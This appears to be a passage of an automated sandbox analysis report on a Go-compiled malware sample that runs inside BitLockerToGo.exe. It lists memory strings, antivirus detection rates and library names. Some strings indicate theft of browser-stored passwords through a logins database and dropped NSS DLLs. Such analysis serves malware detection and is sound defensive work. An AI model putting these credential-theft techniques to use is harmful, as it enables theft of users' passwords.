Source: BitLockerToGo.exe, BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: BitLockerToGo.exe, 00000001.00000003.1916221843.0000000022B59000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1916221437.0000000002A70000.00000004.00000020.00020000.00000000.sdmp, IDAAKEHJDHJKEBFHJEGD.1.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084238802.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe ReversingLabs: Detection: 52%
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Virustotal: Detection: 54%
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: $github.com/mmcloughlin/addchain/meta
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: $*set.Iterator[go.shape.interface {}]$*func(map[string]interface {}) error$github.com/vmihailenco/msgpack/codes$*map[reflect.Type]chan reflect.Value$*map.bucket[string]function.Function$*func(cty.unknownValRefinement) bool$*func(string) *cty.RefinementBuilder$*func() protoreflect.EnumDescriptors$*func(protoreflect.MethodDescriptor)$appendDescriptorProto_ExtensionRange$*func() protoreflect.SourceLocations$*func(int) protoreflect.ProtoMessage$*func() protoreflect.OneofDescriptor$*func() protoreflect.FieldDescriptor$*struct { pragma.NoUnkeyedLiterals }$*map[int32]protoreflect.ProtoMessage$*func(protoreflect.ProtoMessage) int$*map.bucket[chan struct {}]struct {}$*func([]cty.Value) (cty.Type, error)$*func() (cty.Value, hcl.Diagnostics)$*func(impl.pointer) protowire.Number$*func(protoreflect.MessageType) bool$*[8]protoregistry.extensionsByNumber$*func(config.Element) config.Element$github.com/mmcloughlin/addchain/meta
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: &github.com/mmcloughlin/addchain/acc/ir
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: 'github.com/mmcloughlin/addchain/acc/ast
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: '*atomic.Pointer[encoding/gob.encEngine]'*struct { F uintptr; X0 *gob.typeInfo }'*map.bucket[string]metrics.SampledValue'*func(context.Context, metrics.Encoder)'*func(int) protoreflect.FieldDescriptor'appendExtensionRangeOptions_Declaration'*func() protoreflect.MessageDescriptors'*func() protoreflect.ServiceDescriptors'*func(protoreflect.EnumValueDescriptor)'*func(int) protoreflect.OneofDescriptor'github.com/hashicorp/go-immutable-radix'*map[protoreflect.Name]*filedesc.Method'*func(protoreflect.ExtensionType) error'*func(impl.pointer, protoreflect.Value)'*func(protoreflect.Value) reflect.Value'*func(reflect.Value) protoreflect.Value'*interface { XXX_MessageName() string }'*func(protoreflect.FileDescriptor) bool'*map[protoreflect.FullName]interface {}'*func(func(protoreflect.EnumType) bool)'google.golang.org/grpc/internal/grpclog'github.com/mmcloughlin/addchain/acc/ast(*func(*bisect.dedup, *bisect.dedup) bool
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: (github.com/mmcloughlin/addchain/acc/pass
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: asn1:"optional,explicit,tag:1"(*func(logrus.Level, *logrus.Entry) error(*func(hclog.Level, []uint8) (int, error)(*func() credentials.TransportCredentials(*func(time.Duration, time.Duration) bool(*map.bucket[reflect.Type]*msgpack.fields(*func(int) protoreflect.MethodDescriptor(*func() protoreflect.EnumValueDescriptor(*func(protoreflect.FieldDescriptor) bool(*map[string]protoreflect.FieldDescriptor(*map[protoreflect.Name]*filedesc.Message(*func(protoreflect.FileDescriptor) error(*map[protoreflect.Name]*filedesc.Service(google.golang.org/protobuf/internal/impl(*func(interface {}) protoreflect.Message(*struct { F uintptr; X0 impl.Converter }(google.golang.org/protobuf/internal/strs(github.com/mmcloughlin/addchain/acc/pass(*struct { F uintptr; X0 int; X1 string }
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: .github.com/mmcloughlin/addchain/internal/print
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: Cgithub.com/consensys/gnark-crypto/field/generator/internal/addchain
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: Code>protobuf:"varint,1,opt,name=code,proto3" json:"code,omitempty"C*struct { F uintptr; X0 convert.Conversion; X1 convert.Conversion }C*func(protoreflect.FullName, func(protoreflect.ExtensionType) bool)Cgithub.com/consensys/gnark-crypto/field/generator/internal/addchain
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: invalid empty Content-Lengthnet/http: invalid trailer %shttp: no Host in request URLjson: Unmarshal(non-pointer !#$%&()*+-./:;<=>?@[]^_{|}~ unexpected end of JSON input after object key:value pair18189894035458564758300781259094947017729282379150390625reflect.MakeSlice: len > capzero precision finite numberbig: misuse of expNNWindowednegative n for ProbablyPrimehex string without 0x prefixunexpected type %T for Bytes0x64616f2d686172642d666f726bX-Consul-Translate-Addresses/v1/connect/ca/configuration/v1/connect/intentions/exact/v1/connect/intentions/match/v1/connect/intentions/checkfailed to create session: %v/v1/operator/autopilot/statepeering name cannot be emptyUnexpected response code: %dcannot unmarshal DNS messageerror encoding cty.Value: %serror decoding cty.Value: %sunsupported type in set hash%s required, but received %scannot parse '%s' as int: %sfailed to serialize type: %svalue must be a whole numberexpected string but found %Tfailed to read set value: %sfailed to read map value: %sGetSecurityDescriptorControlInitializeSecurityDescriptorSetSecurityDescriptorControlFindFirstChangeNotificationWGetProcessShutdownParametersSetProcessShutdownParametersWTSGetActiveConsoleSessionIdSetupDiClassGuidsFromNameExWSetupDiDestroyDeviceInfoListSetupDiDestroyDriverInfoListabi.NewName: name too long: x509: invalid RSA public keyx509: invalid DSA public keyx509: invalid DSA parametersx509: negative serial numberx509: unknown elliptic curvecurrent time %s is before %sasn1: string not valid UTF-8reflect: In of non-func typereflect: Key of non-map typetls: malformed ECHConfigListEd25519 verification failuremultipart: message too largemultipart: boundary is emptymalformed MIME header line: invalid byte in chunk lengthinvalid proxy address %q: %vpending ASN.1 child too longFailed to obtain reader, %v
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: failed to construct HKDF label: %sGODEBUG sys/cpu: can not disable "invalid nested repetition operatorinvalid or unsupported Perl syntaxError loading file from CAPath: %sname too long (%d bytes): %.20q...msgpack: Decode(nonaddressable %T)crypto/rsa: missing public moduluscrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapchacha20: wrong HChaCha20 key sizecustomdecode.ExpressionClosureTypeMultiplies the given number by -1.the size argument must be positiveunsupported value for %q at %d: %sbad tag in lazy extension decodingmismatching field: got %v, want %vonly degrees 1 and 2 are supported2006-01-02T15:04:05.999999999Z07:00non-positive interval for NewTickerrlp: non-canonical size informationrlp: cannot encode negative big.Intcould not find the kernel32 DLL: %vcrypto/md5: invalid hash state sizeencoding/hex: odd length hex stringnetwork dropped connection on resettransport endpoint is not connectedstrings.Reader.Seek: invalid whenceoptional header checksum is invalidCOFF symbols count is absurdly highnot a PE file, smaller than tiny PEEnglish Trinidad And Tobago (en-TT)Kanuri (Latin) Nigeria (kr-Latn-NG)Serbian (Latin) Serbia (sr-Latn-RS)` SizeOfRawData is larger than filepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=http: server closed idle connectionCONTINUATION frame with stream ID 01776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9isReflexive called on non-key type " is unexported but missing PkgPathreflect.MakeSlice of non-slice typemime: bogus characters after %%: %q'_' must separate successive digitshex number with leading zero digitsbigmod: modulus is smaller than natMust specify an ID in Policy Updateset value for either %q or %q in %qthe value %q cannot parsed as floatTupleElementTypes on non-tuple Typevalue does not have given index keymust not call MapVal with empty mapvalue has no attribute of that nameelement key for list must be number%s: unsupported type for squash: %sweird number of bits in target uintnot enough tuple elements (need %d)SubscribeServiceChangeNotificationsfile type does not support deadlinex509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesssuperfluous leading zeros in lengthexecutable file not found in %PATH%ber2der: BER tag length is negativeunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharehpack: invalid Huffman-encoded datadynamic table size update too largeP224 poi
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: failed to construct HKDF label: %sGODEBUG sys/cpu: can not disable "invalid nested repetition operatorinvalid or unsupported Perl syntaxError loading file from CAPath: %sname too long (%d bytes): %.20q...msgpack: Decode(nonaddressable %T)crypto/rsa: missing public moduluscrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapchacha20: wrong HChaCha20 key sizecustomdecode.ExpressionClosureTypeMultiplies the given number by -1.the size argument must be positiveunsupported value for %q at %d: %sbad tag in lazy extension decodingmismatching field: got %v, want %vonly degrees 1 and 2 are supported2006-01-02T15:04:05.999999999Z07:00non-positive interval for NewTickerrlp: non-canonical size informationrlp: cannot encode negative big.Intcould not find the kernel32 DLL: %vcrypto/md5: invalid hash state sizeencoding/hex: odd length hex stringnetwork dropped connection on resettransport endpoint is not connectedstrings.Reader.Seek: invalid whenceoptional header checksum is invalidCOFF symbols count is absurdly highnot a PE file, smaller than tiny PEEnglish Trinidad And Tobago (en-TT)Kanuri (Latin) Nigeria (kr-Latn-NG)Serbian (Latin) Serbia (sr-Latn-RS)` SizeOfRawData is larger than filepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=http: server closed idle connectionCONTINUATION frame with stream ID 01776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9isReflexive called on non-key type " is unexported but missing PkgPathreflect.MakeSlice of non-slice typemime: bogus characters after %%: %q'_' must separate successive digitshex number with leading zero digitsbigmod: modulus is smaller than natMust specify an ID in Policy Updateset value for either %q or %q in %qthe value %q cannot parsed as floatTupleElementTypes on non-tuple Typevalue does not have given index keymust not call MapVal with empty mapvalue has no attribute of that nameelement key for list must be number%s: unsupported type for squash: %sweird number of bits in target uintnot enough tuple elements (need %d)SubscribeServiceChangeNotificationsfile type does not support deadlinex509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesssuperfluous leading zeros in lengthexecutable file not found in %PATH%ber2der: BER tag length is negativeunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharehpack: invalid Huffman-encoded datadynamic table size update too largeP224 poi
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: failed to construct HKDF label: %sGODEBUG sys/cpu: can not disable "invalid nested repetition operatorinvalid or unsupported Perl syntaxError loading file from CAPath: %sname too long (%d bytes): %.20q...msgpack: Decode(nonaddressable %T)crypto/rsa: missing public moduluscrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapchacha20: wrong HChaCha20 key sizecustomdecode.ExpressionClosureTypeMultiplies the given number by -1.the size argument must be positiveunsupported value for %q at %d: %sbad tag in lazy extension decodingmismatching field: got %v, want %vonly degrees 1 and 2 are supported2006-01-02T15:04:05.999999999Z07:00non-positive interval for NewTickerrlp: non-canonical size informationrlp: cannot encode negative big.Intcould not find the kernel32 DLL: %vcrypto/md5: invalid hash state sizeencoding/hex: odd length hex stringnetwork dropped connection on resettransport endpoint is not connectedstrings.Reader.Seek: invalid whenceoptional header checksum is invalidCOFF symbols count is absurdly highnot a PE file, smaller than tiny PEEnglish Trinidad And Tobago (en-TT)Kanuri (Latin) Nigeria (kr-Latn-NG)Serbian (Latin) Serbia (sr-Latn-RS)` SizeOfRawData is larger than filepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=http: server closed idle connectionCONTINUATION frame with stream ID 01776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9isReflexive called on non-key type " is unexported but missing PkgPathreflect.MakeSlice of non-slice typemime: bogus characters after %%: %q'_' must separate successive digitshex number with leading zero digitsbigmod: modulus is smaller than natMust specify an ID in Policy Updateset value for either %q or %q in %qthe value %q cannot parsed as floatTupleElementTypes on non-tuple Typevalue does not have given index keymust not call MapVal with empty mapvalue has no attribute of that nameelement key for list must be number%s: unsupported type for squash: %sweird number of bits in target uintnot enough tuple elements (need %d)SubscribeServiceChangeNotificationsfile type does not support deadlinex509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesssuperfluous leading zeros in lengthexecutable file not found in %PATH%ber2der: BER tag length is negativeunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharehpack: invalid Huffman-encoded datadynamic table size update too largeP224 poi
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: depgithub.com/mmcloughlin/addchainv0.4.0h1:SobOdjm2xLj1KkXN5/n0xTIWyZA2+s99UCY1iPfkHRY=
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.Equal
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.EqualInt64
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.Pow2
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.One
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.Mask
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.Ones
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigints.Contains
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigints.Index
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Chain.Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigints.Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).AppendClone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Chain.End
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Chain.Ops
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Chain.Op
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Chain.Program
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/internal/bigint.Zero
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Chain.Validate
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Chain.Produces
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Chain.Superset
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Chain.IsAscending
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Op.IsDouble
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Op.Operands
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Op.Uses
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Shift
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Double
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Add
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Program.boundscheck
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Program.Doubles
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Program.Count
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Program.Adds
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Program.Evaluate
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.New
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Program.ReadCounts
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.Program.Dependencies
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).End
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).IsAscending
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).Op
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).Ops
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).Produces
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).Program
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).Superset
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Chain).Validate
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Op).IsDouble
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Op).Operands
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Op).Uses
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Adds
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Count
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Dependencies
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Doubles
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Program).Evaluate
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain.(*Program).ReadCounts
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Program).AddInstruction
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Program.Output
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Program.Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Instruction.Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Operand.Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Program.String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Operand.String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Instruction.Operands
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Instruction.String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Add.Inputs
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Add.Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Add.String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Double.Inputs
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Double.Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Double.String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Shift.Inputs
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Shift.Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Shift.String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: type:.eq.github.com/mmcloughlin/addchain/acc/ir.Operand
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Operand).Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Operand).String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Instruction).Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Instruction).Operands
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Instruction).String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Program).Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Program).Output
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Program).String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Add).Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Add).Inputs
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Add).String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Double).Clone
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Double).Inputs
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Double).String
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe String found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Shift).Clone
